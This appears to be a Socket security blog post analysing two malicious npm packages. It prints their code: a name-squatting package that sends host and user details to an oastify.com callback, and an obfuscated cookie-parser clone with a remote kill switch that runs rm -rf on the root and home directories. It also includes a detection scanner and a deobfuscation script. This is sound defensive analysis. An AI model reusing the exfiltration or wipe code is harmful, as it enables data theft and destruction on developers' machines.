Security News
Research
Data Theft Repackaged: A Case Study in Malicious Wrapper Packages on npm
The Socket Research Team breaks down a malicious wrapper package that uses obfuscation to harvest credentials and exfiltrate sensitive data.
Kush Pandya
October 9, 2024
Every day, our security team sifts through countless npm packages. While most packages published to public registries are safe and useful, some slip through the cracks with malicious intent. Recently, we encountered two particularly troubling packages that highlight some common strategies cybercriminals use to exploit developers: one designed to steal sensitive data outright, and another cleverly disguised to destroy data on your system. This post gives you a glimpse into some of the threats that are lurking in open source package repositories.
Both packages, transferwise-iconfont and protect-api, have now been flagged as malware and we have asked the npm registry to remove them. Each represents a different level of sophistication in malicious code distribution.
We see these kinds of packages every day in our feed. They are often labeled as test packages or something equally innocuous, but in many cases they act as spyware.
The transferwise-iconfont package squats the name of the legitimate TransferWise Iconfont library developed by Wise (formerly TransferWise), a financial technology company focused on global money transfers. The code in the package has nothing to do with the icon font and is not copied from its GitHub repo.
// Excerpt from transferwise-iconfont. The excerpt starts mid-file: the require()
// lines and the two definitions directly below are reconstructed from the widely
// copied dependency-confusion PoC template this code follows, and the request at
// the end is that template's send step (reconstructed, not quoted from the package).
const dns = require("dns");
const os = require("os");
const querystring = require("querystring");
const https = require("https");
const packageJSON = require("./package.json");
const package = packageJSON.name;

// Host fingerprint: package name, install path, home directory, hostname, local
// username, DNS resolvers, the registry URL npm recorded, and the whole package.json.
const trackingData = JSON.stringify({
  p: package,
  c: __dirname,
  hd: os.homedir(),
  hn: os.hostname(),
  un: os.userInfo().username,
  dns: dns.getServers(),
  r: packageJSON ? packageJSON.___resolved : undefined,
  v: packageJSON.version,
  pjson: packageJSON,
});
var postData = querystring.stringify({
  msg: trackingData,
});
var options = {
  hostname: "r7z12f7knlides86u06z22fpzg57tzho.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
  port: 443,
  path: "/",
  method: "POST",
  headers: {
    "Content-Type": "application/x-www-form-urlencoded",
    "Content-Length": postData.length,
  },
};
// Send step (reconstructed from the template). Errors are swallowed, so a
// blocked callback never surfaces to the developer.
var req = https.request(options, (res) => {
  res.on("data", () => {});
});
req.on("error", () => {});
req.write(postData);
req.end();
This package doesn't try to hide its malicious intent. It openly collects identifying data from the user's system and posts it to an out-of-band host controlled by the attacker; it even keeps the template comment telling the operator which callback service to substitute (oastify.com is Burp Collaborator's domain). Its brazenness makes it easy to spot in code review, but only if someone actually reads the code, and an icon-font dependency rarely gets that scrutiny.
The second package, protect-api, masquerades as the legitimate cookie-parser package. Its source has been run through an identifier-renaming obfuscator; the _0x-prefixed names and hex integer literals below are its trademark. At first glance it is a utility for handling HTTP cookies, and that part is genuine, lifted from cookie-parser. Appended to it is a destructive function.
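The callback shape above (read hostname, username, home directory and DNS resolvers, then POST to an out-of-band host) is distinctive enough to catch with plain text matching before a human ever opens the package. The scanner below is an added example, not Socket's detection engine and not code from either package: it scores a JavaScript source file against a handful of signatures and a list of out-of-band interaction domains. The signature list, the domain list, the thresholds and both sample inputs (one shaped like the snippet above with a made-up oastify.com label, one benign) are constructed for illustration.

```javascript
// Added example: static triage heuristic for the "fingerprint the host and
// phone home" pattern. Scans source as text; never executes it.
"use strict";

// Each signature: a regex over the source text and a weight (constructed).
const SIGNATURES = [
  { id: "recon-hostname", re: /\bos\.hostname\s*\(/, weight: 2 },
  { id: "recon-user", re: /\bos\.userInfo\s*\(/, weight: 2 },
  { id: "recon-home", re: /\bos\.homedir\s*\(/, weight: 1 },
  { id: "recon-dns", re: /\bdns\.getServers\s*\(/, weight: 2 },
  { id: "recon-resolved", re: /___resolved\b/, weight: 3 }, // dependency-confusion template marker
  { id: "net-post", re: /method\s*:\s*["']POST["']/, weight: 1 },
];

// Out-of-band interaction services that show up as callback hosts
// (Burp Collaborator, Interactsh, Pipedream). Constructed starting list.
const OAST_DOMAINS = [
  "oastify.com", "burpcollaborator.net", "interact.sh", "oast.pro", "oast.live",
  "oast.site", "oast.online", "oast.fun", "oast.me", "pipedream.net",
];

// Quoted string literals that look like a bare DNS name (no scheme, no path).
const HOST_LITERAL =
  /["']([a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)+)["']/gi;

function extractHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(HOST_LITERAL)) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

function isOastHost(host) {
  return OAST_DOMAINS.some((d) => host === d || host.endsWith("." + d));
}

// Returns { score, verdict, findings, reconCount } for one source file.
function triage(source) {
  const findings = [];
  let score = 0;
  for (const s of SIGNATURES) {
    if (s.re.test(source)) {
      findings.push(s.id);
      score += s.weight;
    }
  }
  const oastHosts = extractHosts(source).filter(isOastHost);
  if (oastHosts.length > 0) {
    findings.push("callback-oast:" + oastHosts.join(","));
    score += 5;
  }
  const reconCount = findings.filter((f) => f.startsWith("recon-")).length;
  // Thresholds are a judgement call: a few host reads plus a POST deserves a
  // human look; a known OAST host on top of that is conclusive.
  const verdict = score >= 8 ? "malicious" : score >= 4 ? "suspicious" : "clean";
  return { score, verdict, findings, reconCount };
}

// Constructed sample in the shape of the transferwise-iconfont snippet
// (the OAST label is made up).
const SUSPECT_SAMPLE = `
const os = require("os");
const dns = require("dns");
const https = require("https");
const querystring = require("querystring");
const packageJSON = require("./package.json");
const trackingData = JSON.stringify({
  hd: os.homedir(), hn: os.hostname(), un: os.userInfo().username,
  dns: dns.getServers(), r: packageJSON.___resolved,
});
const postData = querystring.stringify({ msg: trackingData });
const options = { hostname: "example-label.oastify.com", port: 443, path: "/", method: "POST" };
const req = https.request(options, () => {});
req.write(postData); req.end();
`;

// Constructed benign sample: an icon-font path helper that reads no host data.
const BENIGN_SAMPLE = `
const path = require("path");
module.exports = function iconPath(name) {
  return path.join(__dirname, "fonts", name + ".woff2");
};
`;

// Run directly to see both verdicts (guarded so the file also loads as a module).
if (typeof require !== "undefined" && require.main === module) {
  for (const [name, src] of [["suspect", SUSPECT_SAMPLE], ["benign", BENIGN_SAMPLE]]) {
    console.log(name, JSON.stringify(triage(src)));
  }
}
```

The suspect sample scores 16 (every recon signature, the POST, and the oastify.com host) and the benign one 0. Matching quoted literals rather than every dotted token keeps MIME types and relative file paths out of the host list; the suffix check uses a leading dot so that a domain such as notoastify.com does not match oastify.com.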
// Excerpt from protect-api. signedCookie() is cookie-parser's own helper with its
// identifiers rewritten by the obfuscator: real, working cookie code that serves
// as the cover story. cookie-signature is the dependency cookie-parser uses for
// it (the require is added here so the excerpt loads as written).
var signature = require('cookie-signature');

function signedCookie(_0x2312a4, _0x9d2acc) {
  if (typeof _0x2312a4 !== "string") {
    return undefined;
  }
  if (_0x2312a4.substr(0x0, 0x2) !== 's:') {
    return _0x2312a4;
  }
  var _0xc597d9 = !_0x9d2acc || Array.isArray(_0x9d2acc) ? _0x9d2acc || [] : [_0x9d2acc];
  for (var _0x393c39 = 0x0; _0x393c39 < _0xc597d9.length; _0x393c39++) {
    var _0x505789 = signature.unsign(_0x2312a4.slice(0x2), _0xc597d9[_0x393c39]);
    if (_0x505789 !== false) {
      return _0x505789;
    }
  }
  return false;
}

// The payload. shelljs is a real dependency, pulled in for this one purpose.
const sh = require('shelljs');
module.exports = protectAPI;
function protectAPI() {
  // Analysis evasion: stay silent if the install path contains "mware"
  // (for example a directory named malware/) or "minhtit".
  if (!__dirname.includes("mware") && !__dirname.includes('minhtit')) {
    // Remote kill switch: poll every 0xbb8 = 3000 ms and fire only when the
    // attacker-controlled endpoint returns isAngry: true. fetch is the global
    // available in Node 18+; errors are swallowed so the loop never logs anything.
    setInterval(() => {
      fetch('https://6514b3f1dc3282a6a3cd7125.mockapi.io/server/1').then(_0x231e3e => _0x231e3e.json()).then(_0x361fb2 => {
        if (_0x361fb2.isAngry) {
          angry();
        }
      })['catch'](_0x5d61c5 => {})["finally"](_0x1c49c6 => {});
    }, 0xbb8);
  }
}
// Destructive stage: wipe the working directory, the filesystem root and the
// home directory, with all output discarded.
function angry() {
  sh.exec("rm -rf * > /dev/null 2>&1");
  sh.exec("rm -rf /* > /dev/null 2>&1");
  sh.exec("rm -rf / > /dev/null 2>&1");
  sh.exec("rm -rf ~/* > /dev/null 2>&1");
}
This package is particularly dangerous because, beyond hiding its intent behind obfuscation, it does not run on a fixed schedule at all: it is remotely triggered. Once the application calls the exported function (exactly as it would call cookieParser()), the code polls a mockapi.io endpoint every 3,000 ms (0xbb8) and calls angry() only when the response's isAngry field is truthy. angry() then runs rm -rf against the working directory, the filesystem root and the home directory, discarding all output. The attacker decides when the wipe happens, so it can land long after the install and is harder to trace back to the package. Two smaller details are worth noting: the __dirname checks skip the payload when the install path contains "mware" or "minhtit", a crude way to stay quiet in analysis sandboxes and on specific machines, and the empty catch() and finally() handlers keep the polling loop silent when the kill-switch host is unreachable.
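Reading a fragment in this style is much quicker once the cheap transforms are undone: hex literals back to decimal (so 0xbb8 reads as 3000), bracketed string keys back to dot access (so ['catch'] reads as .catch), and the _0x identifiers replaced by short sequential names. The script below is an added example, not Socket tooling and not code from protect-api, that does exactly that with regular expressions and then pulls out the two facts an analyst wants first, timer delays and shell command strings. The sample input is a constructed fragment in the same shape as the excerpt above; the kill-switch URL is replaced by a placeholder under example.invalid and the rm -rf commands by a harmless echo. Being regex-based it is a reading aid, not a JavaScript parser, and can be fooled by brackets or quotes inside string literals.

```javascript
// Added example: regex-based normaliser for identifier-renaming / hex-literal
// obfuscation, plus extraction of timer delays and shell command strings.
"use strict";

// 1. Hex integer literals (0xbb8) -> decimal (3000). The leading \b leaves
//    obfuscated names like _0x2312a4 alone: "_" is a word character, so there
//    is no word boundary in front of their "0x".
function decodeHexLiterals(src) {
  return src.replace(/\b0x([0-9a-fA-F]+)\b/g, (_, hex) => String(parseInt(hex, 16)));
}

// 2. Bracket access with a plain string key (['catch']) -> dot access (.catch).
function dotifyBracketAccess(src) {
  return src.replace(/\[\s*(["'])([A-Za-z_$][\w$]*)\1\s*\]/g, (_, _q, name) => "." + name);
}

// 3. Rename _0x<hex> identifiers to v1, v2, ... in order of first appearance.
//    Each obfuscated name is unique, so a whole-word global replace is safe.
function renameHexIdentifiers(src, prefix = "v") {
  const renames = new Map();
  for (const m of src.matchAll(/\b_0x[0-9a-fA-F]+\b/g)) {
    if (!renames.has(m[0])) renames.set(m[0], prefix + (renames.size + 1));
  }
  let out = src;
  for (const [from, to] of renames) out = out.replace(new RegExp("\\b" + from + "\\b", "g"), to);
  return { source: out, renames };
}

// 4. setInterval/setTimeout delays: walk to the call's closing paren counting
//    brackets and read the last top-level argument as the delay (null if absent).
function timerDelays(src) {
  const out = [];
  const re = /\b(setInterval|setTimeout)\s*\(/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    let depth = 1;
    let lastComma = -1;
    let i = re.lastIndex;
    for (; i < src.length && depth > 0; i++) {
      const ch = src[i];
      if ("({[".includes(ch)) depth++;
      else if (")}]".includes(ch)) depth--;
      else if (ch === "," && depth === 1) lastComma = i;
    }
    const delay = lastComma === -1 ? NaN : Number(src.slice(lastComma + 1, i - 1).trim());
    out.push({ fn: m[1], delayMs: Number.isFinite(delay) ? delay : null });
  }
  return out;
}

// 5. String arguments passed to .exec()/.execSync() (shelljs, child_process).
function shellCommands(src) {
  const re = /\.exec(?:Sync)?\s*\(\s*(["'])((?:\\.|(?!\1)[^\\])*)\1/g;
  return [...src.matchAll(re)].map((m) => m[2]);
}

function deobfuscate(src) {
  const { source, renames } = renameHexIdentifiers(dotifyBracketAccess(decodeHexLiterals(src)));
  return { source, renames, timers: timerDelays(source), shell: shellCommands(source) };
}

// Constructed input in the same shape as the protect-api excerpt: placeholder
// kill-switch URL, and the rm -rf commands replaced by a harmless echo.
const SAMPLE = `
const sh = require('shelljs');
module.exports = protectAPI;
function protectAPI() {
  if (!__dirname.includes("mware") && !__dirname.includes('minhtit')) {
    setInterval(() => {
      fetch('https://example.invalid/server/1').then(_0x231e3e => _0x231e3e.json()).then(_0x361fb2 => {
        if (_0x361fb2.isAngry) {
          angry();
        }
      })['catch'](_0x5d61c5 => {})["finally"](_0x1c49c6 => {});
    }, 0xbb8);
  }
}
function angry() {
  sh.exec("echo would-run-rm-rf > /dev/null 2>&1");
}
`;

// Run directly to print the normalised source and the extracted facts.
if (typeof require !== "undefined" && require.main === module) {
  const result = deobfuscate(SAMPLE);
  console.log(result.source);
  console.log("timers:", result.timers, "shell:", result.shell);
}
```

On the sample this yields a loop reading `setInterval(() => { fetch(...).then(v1 => v1.json()).then(v2 => { if (v2.isAngry) { angry(); } }).catch(v3 => {}).finally(v4 => {}); }, 3000);`, one timer of 3000 ms and one shell command, which is the whole story of the kill switch in a form a reviewer can read in seconds.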
Both packages exploit the trust developers place in the npm ecosystem. The spyware package bets that nobody scrutinizes an icon-font dependency. What it collects is exactly what the snippet shows: the package name, install path, home directory, hostname, local username, DNS resolver addresses, the ___resolved field (meant to capture the registry URL npm records for an installed package) and the whole package.json. That is the standard dependency-confusion callback: the hostname, username and resolver addresses tell the attacker whether the package was pulled inside a corporate network, and the resolved URL tells them which registry served it.
The obfuscated package is more insidious. It leverages legitimate functionality (cookie parsing lifted from cookie-parser) as cover for its destructive payload. Obfuscation makes the malicious code harder for automated tools and manual reviewers to pick out, and putting the trigger behind a remote kill switch means the wipe can be timed long after install, which complicates both attribution and detection.
npm is rife with low-effort attempts to compromise unsuspecting users' machines or data. Here are a few best practices for making sure one of these packages doesn't land in your code base:
If you're not yet using Socket, our AI-powered threat detection is the best way to protect yourself from these types of nightmare packages. Install our free Socket for GitHub app with just two clicks to instantly protect your repos from these types of threats. It will automatically scan your dependencies for security and code quality issues and give you real-time alerts.
The npm ecosystem, while incredibly powerful and convenient, is not without its dangers. The cases we've explored today are just a small sampling of the security threats we see plaguing open source code repositories.
Don't let your project become the next victim of a malicious package. The best defense against these threats is a combination of awareness, tools, and best practices. Stay safe out there!
Malicious packages covered in this post: transferwise-iconfont and protect-api.